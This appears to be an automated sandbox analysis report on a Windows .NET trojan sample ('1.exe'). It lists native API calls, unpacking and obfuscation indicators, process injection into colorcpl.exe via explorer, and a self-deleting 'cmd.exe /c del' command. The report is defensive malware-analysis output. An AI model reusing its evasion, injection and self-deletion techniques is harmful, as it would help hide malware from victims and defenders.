Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F116CC 4_2_04F116CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EA5630 4_2_04EA5630
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1F7B0 4_2_04F1F7B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1F0E0 4_2_04F1F0E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F170E9 4_2_04F170E9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E670C0 4_2_04E670C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F0F0CC 4_2_04F0F0CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6B1B0 4_2_04E6B1B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E9516C 4_2_04E9516C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E4F172 4_2_04E4F172
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F2B16B 4_2_04F2B16B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F012ED 4_2_04F012ED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7B2C0 4_2_04E7B2C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E652A0 4_2_04E652A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EA739A 4_2_04EA739A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E4D34C 4_2_04E4D34C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1132D 4_2_04F1132D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FCF2 4_2_04F1FCF2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ED9C32 4_2_04ED9C32
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7FDC0 4_2_04E7FDC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F17D73 4_2_04F17D73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E63D40 4_2_04E63D40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F11D5A 4_2_04F11D5A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E69EB0 4_2_04E69EB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E23FD2 4_2_04E23FD2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E23FD5 4_2_04E23FD5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FFB1 4_2_04F1FFB1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E61F92 4_2_04E61F92
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FF09 4_2_04F1FF09
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E638E0 4_2_04E638E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ECD800 4_2_04ECD800
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E69950 4_2_04E69950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7B950 4_2_04E7B950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EF5910 4_2_04EF5910
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F0DAC6 4_2_04F0DAC6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EFDAAC 4_2_04EFDAAC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EA5AA0 4_2_04EA5AA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F01AA3 4_2_04F01AA3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ED3A6C 4_2_04ED3A6C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F17A46 4_2_04F17A46
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FA49 4_2_04F1FA49
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E9DBF9 4_2_04E9DBF9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ED5BF0 4_2_04ED5BF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7FB80 4_2_04E7FB80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FB76 4_2_04F1FB76
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3C5E0 4_2_02E3C5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E22FB0 4_2_02E22FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E28C4B 4_2_02E28C4B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E28C50 4_2_02E28C50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E22D90 4_2_02E22D90
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\1.exe Code function: String function: 017AF290 appears 105 times
Source: C:\Users\user\Desktop\1.exe Code function: String function: 01777E54 appears 111 times
Source: C:\Users\user\Desktop\1.exe Code function: String function: 0179EA12 appears 86 times
Source: C:\Users\user\Desktop\1.exe Code function: String function: 0171B970 appears 280 times
Source: C:\Users\user\Desktop\1.exe Code function: String function: 01765130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04E95130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04EDF290 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04EA7E54 appears 111 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04ECEA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 04E4B970 appears 280 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004181B0 NtCreateFile, 2_2_004181B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00418260 NtReadFile, 2_2_00418260
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004182E0 NtClose, 2_2_004182E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00418390 NtAllocateVirtualMemory, 2_2_00418390
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004181AB NtCreateFile, 2_2_004181AB
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041838A NtAllocateVirtualMemory, 2_2_0041838A
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762B60 NtClose,LdrInitializeThunk, 2_2_01762B60
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01762BF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762AD0 NtReadFile,LdrInitializeThunk, 2_2_01762AD0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762D30 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_01762D30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762D10 NtMapViewOfSection,LdrInitializeThunk, 2_2_01762D10
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01762DF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762DD0 NtDelayExecution,LdrInitializeThunk, 2_2_01762DD0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_01762C70
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762CA0 NtQueryInformationToken,LdrInitializeThunk, 2_2_01762CA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762F30 NtCreateSection,LdrInitializeThunk, 2_2_01762F30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762FE0 NtCreateFile,LdrInitializeThunk, 2_2_01762FE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762FB0 NtResumeThread,LdrInitializeThunk, 2_2_01762FB0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762F90 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01762F90
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01762EA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762E80 NtReadVirtualMemory,LdrInitializeThunk, 2_2_01762E80
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017635C0 NtCreateMutant,LdrInitializeThunk, 2_2_017635C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01764340 NtSetContextThread, 2_2_01764340
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01764650 NtSuspendThread, 2_2_01764650
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762BE0 NtQueryValueKey, 2_2_01762BE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762BA0 NtEnumerateValueKey, 2_2_01762BA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762B80 NtQueryInformationFile, 2_2_01762B80
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762AF0 NtWriteFile, 2_2_01762AF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762AB0 NtWaitForSingleObject, 2_2_01762AB0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762D00 NtSetInformationFile, 2_2_01762D00
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762DB0 NtEnumerateKey, 2_2_01762DB0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762C60 NtCreateKey, 2_2_01762C60
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762C00 NtQueryInformationProcess, 2_2_01762C00
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762CF0 NtOpenProcess, 2_2_01762CF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762CC0 NtQueryVirtualMemory, 2_2_01762CC0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762F60 NtCreateProcessEx, 2_2_01762F60
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762FA0 NtQuerySection, 2_2_01762FA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762E30 NtWriteVirtualMemory, 2_2_01762E30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01762EE0 NtQueueApcThread, 2_2_01762EE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01763010 NtOpenDirectoryObject, 2_2_01763010
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01763090 NtSetValueKey, 2_2_01763090
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017639B0 NtGetContextThread, 2_2_017639B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01763D70 NtOpenThread, 2_2_01763D70
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01763D10 NtOpenProcessToken, 2_2_01763D10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_04E92CA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92C60 NtCreateKey,LdrInitializeThunk, 4_2_04E92C60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_04E92C70
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_04E92DF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92DD0 NtDelayExecution,LdrInitializeThunk, 4_2_04E92DD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_04E92D10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_04E92EA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92FE0 NtCreateFile,LdrInitializeThunk, 4_2_04E92FE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92F30 NtCreateSection,LdrInitializeThunk, 4_2_04E92F30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92AD0 NtReadFile,LdrInitializeThunk, 4_2_04E92AD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92BE0 NtQueryValueKey,LdrInitializeThunk, 4_2_04E92BE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_04E92BF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92B60 NtClose,LdrInitializeThunk, 4_2_04E92B60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E935C0 NtCreateMutant,LdrInitializeThunk, 4_2_04E935C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E94650 NtSuspendThread, 4_2_04E94650
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E94340 NtSetContextThread, 4_2_04E94340
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92CF0 NtOpenProcess, 4_2_04E92CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92CC0 NtQueryVirtualMemory, 4_2_04E92CC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92C00 NtQueryInformationProcess, 4_2_04E92C00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92DB0 NtEnumerateKey, 4_2_04E92DB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92D30 NtUnmapViewOfSection, 4_2_04E92D30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92D00 NtSetInformationFile, 4_2_04E92D00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92EE0 NtQueueApcThread, 4_2_04E92EE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92E80 NtReadVirtualMemory, 4_2_04E92E80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92E30 NtWriteVirtualMemory, 4_2_04E92E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92FA0 NtQuerySection, 4_2_04E92FA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92FB0 NtResumeThread, 4_2_04E92FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92F90 NtProtectVirtualMemory, 4_2_04E92F90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92F60 NtCreateProcessEx, 4_2_04E92F60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92AF0 NtWriteFile, 4_2_04E92AF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92AB0 NtWaitForSingleObject, 4_2_04E92AB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92BA0 NtEnumerateValueKey, 4_2_04E92BA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E92B80 NtQueryInformationFile, 4_2_04E92B80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E93090 NtSetValueKey, 4_2_04E93090
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E93010 NtOpenDirectoryObject, 4_2_04E93010
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E93D70 NtOpenThread, 4_2_04E93D70
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E93D10 NtOpenProcessToken, 4_2_04E93D10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E939B0 NtGetContextThread, 4_2_04E939B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E382E0 NtClose, 4_2_02E382E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E38260 NtReadFile, 4_2_02E38260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E38390 NtAllocateVirtualMemory, 4_2_02E38390
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E381B0 NtCreateFile, 4_2_02E381B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3838A NtAllocateVirtualMemory, 4_2_02E3838A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E381AB NtCreateFile, 4_2_02E381AB
Sample file is different than original file name gathered from version info
Source: 1.exe, 00000000.00000002.2054404991.0000000046E00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameGlaxoSmithKline.dll@ vs 1.exe
Source: 1.exe, 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGlaxoSmithKline.dll@ vs 1.exe
Source: 1.exe, 00000000.00000000.1985024133.0000000000992000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDuplicateWaitObjectException.exe< vs 1.exe
Source: 1.exe, 00000000.00000002.2038213764.0000000026A00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNT1.dll, vs 1.exe
Source: 1.exe, 00000000.00000002.2024194329.0000000006021000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNT1.dll, vs 1.exe
Source: 1.exe, 00000000.00000002.2019687463.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 1.exe
Source: 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamecolorcpl.exej% vs 1.exe
Source: 1.exe, 00000002.00000002.2046399747.0000000001523000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamecolorcpl.exej% vs 1.exe
Source: 1.exe, 00000002.00000002.2046479384.000000000181D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 1.exe
Source: 1.exe Binary or memory string: OriginalFilenameDuplicateWaitObjectException.exe< vs 1.exe
Source: 1.exe ReversingLabs: Detection: 92%
Source: 1.exe Virustotal: Detection: 82%
Source: C:\Users\user\Desktop\1.exe File read: C:\Users\user\Desktop\1.exe:Zone.Identifier Jump to behavior
Source: 1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe
Source: C:\Users\user\Desktop\1.exe Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1.exe Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1.exe" Jump to behavior
Source: C:\Users\user\Desktop\1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@303/1@37/4
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\1.exe Mutant created: \Sessions\1\BaseNamedObjects\LtuPWOmKmRtPgVVETlqTXm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3948:120:WilError_03
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.46e00000.8.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.46e00000.8.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.4009280.3.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1.exe.4009280.3.raw.unpack, Callback.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\Desktop\1.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: 1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: colorcpl.pdbGCTL source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 1.exe, 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 1.exe, SwitchValueState.cs .Net Code: CspKeyContainerInfo System.AppDomain.Load(byte[])
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, ContextConfigurationAdapter.cs .Net Code: CustomizeParams System.Reflection.Assembly.Load(byte[])
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs .Net Code: CustomizeParams System.Reflection.Assembly.Load(byte[])
Source: 0.2.1.exe.4009280.3.raw.unpack, ContextConfigurationAdapter.cs .Net Code: CustomizeParams System.Reflection.Assembly.Load(byte[])
Source: 3.2.explorer.exe.111b7960.0.raw.unpack, SwitchValueState.cs .Net Code: CspKeyContainerInfo System.AppDomain.Load(byte[])
Source: 4.2.colorcpl.exe.5377960.3.raw.unpack, SwitchValueState.cs .Net Code: CspKeyContainerInfo System.AppDomain.Load(byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, Callback.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.1.exe.46e00000.8.raw.unpack, Callback.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.1.exe.4009280.3.raw.unpack, Callback.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1.exe Code function: 0_2_02C8E7C2 push eax; ret 0_2_02C8E7C9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041D121 push ds; ret 2_2_0041D137
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00416290 push ds; iretd 2_2_00416291
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041B3FB push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00415BBB push es; retf 2_2_00415C36
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041B45C push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F225F pushad ; ret 2_2_016F27F9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F27FA pushad ; ret 2_2_016F27F9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017209AD push ecx; mov dword ptr [esp], ecx 2_2_017209B6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F283D push eax; iretd 2_2_016F2858
Source: C:\Windows\explorer.exe Code function: 3_2_103F60DE push edi; retf 3_2_103F60DF
Source: C:\Windows\explorer.exe Code function: 3_2_109820DE push edi; retf 3_2_109820DF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E227FA pushad ; ret 4_2_04E227F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E2225F pushad ; ret 4_2_04E227F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E2283D push eax; iretd 4_2_04E22858
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E509AD push ecx; mov dword ptr [esp], ecx 4_2_04E509B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E36290 push ds; iretd 4_2_02E36291
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3B3F2 push eax; ret 4_2_02E3B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3B3FB push eax; ret 4_2_02E3B462
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3B3A5 push eax; ret 4_2_02E3B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3D121 push ds; ret 4_2_02E3D137
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E3B45C push eax; ret 4_2_02E3B462
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_02E35BBB push es; retf 4_2_02E35C36
Source: initial sample Static PE information: section name: .text entropy: 6.8175261260266655
